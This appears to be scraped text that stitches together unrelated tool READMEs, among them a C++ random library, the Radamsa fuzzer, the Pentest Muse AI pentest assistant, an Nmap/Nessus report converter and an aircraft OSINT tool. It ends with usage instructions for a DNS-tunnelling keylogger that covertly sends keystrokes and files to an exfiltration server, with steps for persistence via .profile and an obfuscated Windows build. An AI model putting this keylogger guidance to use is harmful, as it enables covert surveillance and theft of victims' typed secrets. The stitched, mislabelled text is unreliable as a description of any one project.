This library was developed to combat insecure methods of storing random data into modern C++ containers. For example, old and clunky PRNGs. Thus, rrgen uses STL's distribution engines in order to efficiently and safely store a random number distribution into a given C++ container.
Installation
1) git clone https://github.com/josh0xA/rrgen.git 2) cd rrgen 3) make 4) Add include/rrgen.hpp to your project tree for access to the library classes and functions.
int main(void) { // Example usage for rrgen vector rrgen::rrand<float, std::vector, 10> rrvec; rrvec.gen_rrvector(false, true, 0, 10); for (auto &i : rrvec.contents()) { std::cout << i << " "; } // ^ the same as rrvec.show_contents()
// Example usage for rrgen list (frontside insertion) rrgen::rrand<int, std::list, 10> rrlist; rrlist.gen_rrlist(false, true, "fside", 5, 25); std::cout << '\n'; rrlist.show_contents(); std::cout << "Size: " << rrlist.contents().size() << '\n';
// Example usage for rrgen array rrgen::rrand_array<int, 5> rrarr; rrarr.gen_rrarray(false, true, 5, 35); for (auto &i : rrarr.contents()) { std::cout << i << " "; } // ^ the same as rrarr. show_contents()
// Example usage for rrgen stack rrgen::rrand_stack<float, 10> rrstack; rrstack.gen_rrstack(false, true, 200, 1000); for (auto m = rrstack.xsize(); m > 0; m--) { std::cout << rrstack.grab_top() << " "; rrstack.pop_off(); if (m == 1) { std::cout << '\n'; } } }
Note: This is a transferred repository, from a completely unrelated project.
Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.
Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.
Installation & Usage
npm install -g noia noia
Features
Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.
View custom binary files. Directly preview SQLite databases, images, and more.
Search application by name.
Search files and directories by name.
Navigate to a custom directory using the ctrl+g shortcut.
Download the application files and directories for further analysis.
You can customize the network password and other configurations on files at confs/hostapd_confs/. You can also add your own hostapdconfiguration files here.
Management using plain docker
Add --rm for volatile containers.
Create and run a container with default (Open) configuration (stop with Ctrl+C)
docker run --name autowlan_open --cap-add=NET_ADMIN --network=host autowlan
Create and run a container with WEP configuration (stop with Ctrl+C)
docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan
Create and run a container with WPA2 configuration (stop with Ctrl+C)
docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.
Nutshell:
$ # please please please fuzz your programs. here is one way to get data for it: $ sudo apt-get install gcc make git wget $ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install $ echo "HAL 9000" | radamsa
What the Fuzz
Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.
Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.
There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.
Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.
Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.
Requirements
Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)
Software requirements for building from sources: * gcc / clang * make * git * wget
Building Radamsa
$ git clone https://gitlab.com/akihe/radamsa.git $ cd radamsa $ make $ sudo make install # optional, you can also just grab bin/radamsa $ radamsa --help
Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.
Fuzzing with Radamsa
This section assumes some familiarity with UNIX scripting.
Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.
Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.
In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.
$ echo "aaa" | radamsa aaaa
Here radamsa decided to add one 'a' to the input. Let's try that again.
$ echo "aaa" | radamsa Λaaa
Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.
This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.
You can generate more than one output by using the -n parameter as follows:
Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:
$ gzip -c /bin/bash > sample.gz $ while true; do radamsa sample.gz | gzip -d > /dev/null; done
Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:
$ gzip -c /bin/bash > sample.gz $ while true do radamsa sample.gz > fuzzed.gz gzip -dc fuzzed.gz > /dev/null test $? -gt 127 && break done
This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.
One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.
This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.
In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.
Output Options
The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:
A non-exhaustive list of related free tools: * American fuzzy lop (http://lcamtuf.coredump.cx/afl/) * Zzuf (http://caca.zoy.org/wiki/zzuf) * Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/) * Peach (http://peachfuzzer.com/) * Sulley (http://code.google.com/p/sulley/)
Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.
Some Known Results
A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.
The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.
We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.
Thanks
The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.
Darkkey
Branden Archer
Troubleshooting
Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.
You can also drop by at #radamsa on Freenode if you have questions or feedback.
Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.
Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.
FAQ
Q: If I find a bug with radamsa, do I have to mention the tool? A: No.
Q: Will you make a graphical version of radamsa?
A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.
Q: I can't install! I don't have root access on the machine! A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.
Q: Radamsa takes several GB of memory to compile!1 A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.
Q: Radamsa does not compile using the instructions in this page! A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email ([email protected]) or IRC (#radamsa on freenode).
Q: I used fuzzer X and found much more bugs from program Y than Radamsa did. A: Cool. Let me know about it ([email protected]) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.
Q: Can I get support for using radamsa? A: You can send email to [email protected] or check if some of us happen to be hanging around at #radamsa on freenode.
Q: Can I use radamsa on Windows? A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.
Q: How can I install radamsa? A: Grab a binary from downloads and run it, or $ make && sudo make install.
Q: How can I uninstall radamsa? A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.
Q: Why are many outputs generated by Radamsa equal? A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.
Q: There are lots of command line options. Which should I use for best results? A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.
Q: How can I make radamsa faster? A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.
Q: What's with the funny name? A: It's from a scene in a Finnish children's story. You've probably never heard about it.
Q: Is this the last question? A: Yes.
Warnings
Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.
Not safe when used as prescribed.
This product may contain faint traces of parenthesis.
Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.
Pentest Muse Web App
In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.
Disclaimer
This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
Requirements
Python 3.12 or later
Necessary Python packages as listed in requirements.txt
Setup
Standard Setup
Clone the repository:
git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse
Install the required packages:
pip install -r requirements.txt
Alternative Setup (Package Installation)
Install Pentest Muse as a Python Package:
pip install .
Running the Application
Chat Mode (Default)
In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:
python run_app.py
or
pmuse
Agent Mode (Experimental)
You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:
python run_app.py agent
or
pmuse agent
Selection of Language Models
Managed APIs
You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.
OpenAI API keys
Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.
Contact
For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at [email protected] or join our discord. Your input is invaluable in helping us improve and evolve.
This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:
Nmap (XML);
Nessus (XML);
Nikto (XML);
Dirble (XML);
Testssl (JSON);
Fortify (FPR).
Rationale
This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
Dependencies
argparse (dev-python/argparse);
prettytable (dev-python/prettytable);
python (dev-lang/python);
xlsxwriter (dev-python/xlsxwriter).
Install
Using Pip:
pip install --user sr2t
Usage
You can use sr2t in two ways:
When installed as package, call the installed script: sr2t --help.
When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
optional arguments: -h, --help show this help message and exit --nmap-state NMAP_STATE Specify the desired state to filter (e.g. open|filtered). --nmap-services Specify to ouput a supplemental list of detected services. --no-nessus-autoclassify Specify to not autoclassify Nessus results. --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE Specify to override a custom Nessus autoclassify YAML file. --nessus-tls-file NESSUS_TLS_FILE Specify to override a custom Nessus TLS findings YAML file. --nessus-x509-file NESSUS_X509_FILE Specify to override a custom Nessus X.509 findings YAML file. --nessus-http-file NESSUS_HTTP_FILE Specify to override a custom Nessus HTTP findings YAML file. --nessus-smb-file NESSUS_SMB_FILE Specify to override a custom Nessus SMB findings YAML file. --nessus-rdp-file NESSUS_RDP_FILE Specify to override a custom Nessus RDP findings YAML file. --nessus-ssh-file NESSUS_SSH_FILE Specify to override a custom Nessus SSH findings YAML file. --nessus-min-severity NESSUS_MIN_SEVERITY Specify the minimum severity to output (e.g. 1). --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH Specify the width of the pluginid column (e.g. 30). --nessus-sort-by NESSUS_SORT_BY Specify to sort output by ip-address, port, plugin-id, plugin-name or severity. --nikto-description-width NIKTO_DESCRIPTION_WIDTH Specify the width of the description column (e.g. 30). --fortify-details Specify to include the Fortify abstracts, explanations and recommendations for each vulnerability. --annotation-width ANNOTATION_WIDTH Specify the width of the annotation column (e.g. 30). -oC OUTPUT_CSV, --output-csv OUTPUT_CSV Specify the output CSV basename (e.g. output). -oT OUTPUT_TXT, --output-txt OUTPUT_TXT Specify the output TXT file (e.g. output.txt). -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX Specify the outpu t XLSX file (e.g. output.xlsx). Only for Nessus at the moment -oA OUTPUT_ALL, --output-all OUTPUT_ALL Specify the output basename to output to all formats (e.g. output).
specify at least one: --nessus NESSUS [NESSUS ...] Specify (multiple) Nessus XML files. --nmap NMAP [NMAP ...] Specify (multiple) Nmap XML files. --nikto NIKTO [NIKTO ...] Specify (multiple) Nikto XML files. --dirble DIRBLE [DIRBLE ...] Specify (multiple) Dirble XML files. --testssl TESTSSL [TESTSSL ...] Specify (multiple) Testssl JSON files. --fortify FORTIFY [FORTIFY ...] Specify (multiple) HP Fortify FPR files.
$ sr2t --nessus example/nessus.nessus +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+ | host | port | plugin id | plugin name | severity | annotations | +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+ | 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X | | 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X | | 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X | | 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X | | 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X | | 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X | | 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X | | 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X | | 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X | | 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X | | 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X | | 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X | | 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X | | 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X | | 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X | | 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X | | 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X | | 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X | | 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X | | 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X | | 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X | | 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X | | 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X | +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example $ cat example_nessus.csv host,port,plugin id,plugin name,severity,annotations 192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X 192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X 192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X 192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X 192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X 192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X 192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X 192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X 192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X 192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X 192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X 192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X 192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X 192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X 192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X 192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X 192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X 192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X 192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X 192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X 192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X 192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X 192.168.142.2,44 5,57608,SMB Signing not required,2,X
Nmap
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services Nmap TCP: +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+ | | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 | +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+ | 192.168.23.78 | X | | X | X | X | X | X | X | | | | 192.168.27.243 | | | | X | X | | X | X | X | X | | 192.168.99.164 | | | | X | X | | X | X | X | X | | 192.168.228.211 | | X | | | | | | | | | | 192.168.171.74 | | | | X | X | | X | X | X | X | +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services: +-----------------+------+-------+---------------+-------+ | ip address | port | proto | service | state | +--------------- --+------+-------+---------------+-------+ | 192.168.23.78 | 53 | tcp | domain | open | | 192.168.23.78 | 88 | tcp | kerberos-sec | open | | 192.168.23.78 | 135 | tcp | msrpc | open | | 192.168.23.78 | 139 | tcp | netbios-ssn | open | | 192.168.23.78 | 389 | tcp | ldap | open | | 192.168.23.78 | 445 | tcp | microsoft-ds | open | | 192.168.23.78 | 3389 | tcp | ms-wbt-server | open | | 192.168.27.243 | 135 | tcp | msrpc | open | | 192.168.27.243 | 139 | tcp | netbios-ssn | open | | 192.168.27.243 | 445 | tcp | microsoft-ds | open | | 192.168.27.243 | 3389 | tcp | ms-wbt-server | open | | 192.168.27.243 | 5800 | tcp | vnc-http | open | | 192.168.27.243 | 5900 | tcp | vnc | open | | 192.168.99.164 | 135 | tcp | msrpc | open | | 192.168.99.164 | 139 | tcp | netbios-ssn | open | | 192 .168.99.164 | 445 | tcp | microsoft-ds | open | | 192.168.99.164 | 3389 | tcp | ms-wbt-server | open | | 192.168.99.164 | 5800 | tcp | vnc-http | open | | 192.168.99.164 | 5900 | tcp | vnc | open | | 192.168.228.211 | 80 | tcp | http | open | | 192.168.171.74 | 135 | tcp | msrpc | open | | 192.168.171.74 | 139 | tcp | netbios-ssn | open | | 192.168.171.74 | 445 | tcp | microsoft-ds | open | | 192.168.171.74 | 3389 | tcp | ms-wbt-server | open | | 192.168.171.74 | 5800 | tcp | vnc-http | open | | 192.168.171.74 | 5900 | tcp | vnc | open | +-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example $ cat example_nmap_tcp.csv ip address,53,80,88,135,139,389,445,3389,5800,5900 192.168.23.78,X,,X,X,X,X,X,X,, 192.168.27.243,,,,X,X,,X,X,X,X 192.168.99.164,,,,X,X,,X,X,X,X 192.168.228.211,,X,,,,,,,, 192.168.171.74,,,,X,X,,X,X,X,X
$ sr2t --nikto example/nikto.xml +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+ | target ip | target hostname | target port | description | annotations | +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+ | 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X | | 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X | | | | | agent to protect against some forms of XSS | | | 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X | | | | | render the content of the site in a different fashion to the MIME type | | +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
$ sr2t --nikto example/nikto.xml -oC example $ cat example_nikto.csv target ip,target hostname,target port,description,annotations 192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X 192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS",X 192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type",X
$ sr2t --testssl example/testssl.json +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+ | ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard | +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+ | rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X | +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
Or to output a CSV file:
$ sr2t --testssl example/testssl.json -oC example $ cat example_testssl.csv ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
skytrack is a command-line based plane spotting and aircraft OSINT reconnaissanceΒ tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purposeΒ reconnaissance.
What is Planespotting & Aircraft OSINT?
Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft informationΒ gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject β in this case planes!
skytrack features three main functions for aircraft information
gathering and display options. They include the following:
Aircraft Reconnaissance & OSINT
skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.
PDF Aircraft Information Report
skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"
Tail Number to ICAO Converter
There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft
reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.
Further Explanation
ICAO and Tail Numbers follow a mapping system like the following:
ICAO address N-Number (Tail Number)
a00001 N1
a00002 N1A
a00003 N1AA
You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)
:warning: Converter only works for USA-registered aircraft
These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.
Server
Setup
The server uses python3.
To install dependencies, run python3 -m pip install -r requirements.txt
Starting the Server
To start the server, run python3 main.py
usage: dns exfiltration server [-h] [-p PORT] ip domain
positional arguments: ip domain
options: -h, --help show this help message and exit -p PORT, --port PORT port to listen on
By default, the server listens on UDP port 53. Use the -p flag to specify a different port.
ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.
domain is the domain to listen for, which should be the domain that the server is authoritative for.
Registrar
On the registrar, you want to change your domain's namespace to custom DNS.
Point them to two domains, ns1.example.com and ns2.example.com.
Add records that make point the namespace domains to your exfiltration server's IP address.
This is the same as setting glue records.
Client
Linux
The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.
logger.sh
# Usage: logger.sh [-options] domain # Positional Arguments: # domain: the domain to send data to # Options: # -p path: give path to log file to listen to # -l: run the logger with warnings and errors printed
To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.
The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.
The -l option will show warnings and errors. Can be useful for debugging.
logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.
connection.sh
Usage: command [-options] domain Positional Arguments: domain: the domain to send data to Options: -n: number of characters to store before sending a packet
Windows
Build
To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.
make production domain=example.com
You can also choose to build the program with debugging by making the debug target.
make debug domain=example.com
For both targets, you will need to specify the domain the server is listening for.
Sending Test Requests
You can use dig to send requests to the server:
dig @127.0.0.1 a.1.1.1.example.com A +short send a connection request to a server on localhost.
dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short send a test message to localhost.
Replace example.com with the domain the server is listening for.
Protocol
Starting a Connection
A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.
